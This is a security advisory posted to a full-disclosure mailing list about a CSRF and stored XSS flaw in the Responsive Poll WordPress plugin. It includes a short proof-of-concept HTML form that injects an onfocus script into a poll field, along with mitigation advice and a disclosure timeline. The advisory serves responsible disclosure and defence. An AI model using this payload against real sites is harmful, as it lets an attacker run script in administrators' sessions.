Date: Tue, 10 Jan 2017 13:27:27 +0000
From: dxw Security <security@....com>
To: fulldisclosure@...lists.org
Subject: [FD] CSRF/XSS in Responsive Poll allows unauthenticated attackers
	to do almost anything an admin can (WordPress plugin)

Details
================
Software: Responsive Poll
Version: 1.6.4,1.7.4
Homepage: http://codecanyon.net/item/responsive-poll/6785692
Advisory report: https://security.dxw.com/advisories/csrfxss-in-responsive-poll-allows-unauthenticated-attackers-to-do-almost-anything-an-admin-can/
CVE: Awaiting assignment
CVSS: 5.8 (Medium; AV:N/AC:M/Au:N/C:P/I:P/A:N)

Description
================
CSRF/XSS in Responsive Poll allows unauthenticated attackers to do almost anything an admin can

Vulnerability
================
This plugin lacks CSRF checks when updating polls meaning an unauthenticated attacker can cause anything to be modified in a poll. The plugin also fails to escape values put into HTML. The combination of these two means that an unauthenticated attacker can put arbitrary JavaScript into a page in /wp-admin/.

Proof of concept
================
Create a poll. We assume that the ID of this poll will be 1.
Visit the following page and click submit (in a real attack the form can be submitted without user interaction):
<form method=\"POST\" action=\"http://localhost/wp-admin/admin-ajax.php\">
<input type=\"text\" name=\"poll_id\" value=\"1\">
<input type=\"text\" name=\"action\" value=\"update_poll\">
<input type=\"text\" name=\"name\" value=\"&quot; onfocus=&quot;alert(1)\">
<input type=\"submit\">
</form>
Then visit http://localhost/wp-admin/admin.php?page=polls&action=edit&edit_poll=1 and focus the Question field (either via clicking on it or tabbing to it).

Mitigations
================
Disable the plugin until a new version is released that fixes this bug.

Disclosure policy
================
dxw believes in responsible disclosure. Your attention is drawn to our disclosure policy: https://security.dxw.com/disclosure/

Please contact us on security@....com to acknowledge this report if you received it via a third party (for example, plugins@...dpress.org) as they generally cannot communicate with us on your behalf.

This vulnerability will be published if we do not receive a response to this report with 14 days.

Timeline

2015-09-15: Discovered
2016-12-07: Reported to vendor via https://codecanyon.net/user/weblator
2016-12-07: Requested CVE
2016-12-15: Vendor first replied
2017-01-10: It’s been over 30 days and the vendor has not reported the bug fixed or indicated when they expect it to be fixed
2017-01-10: Advisory published

Discovered by dxw: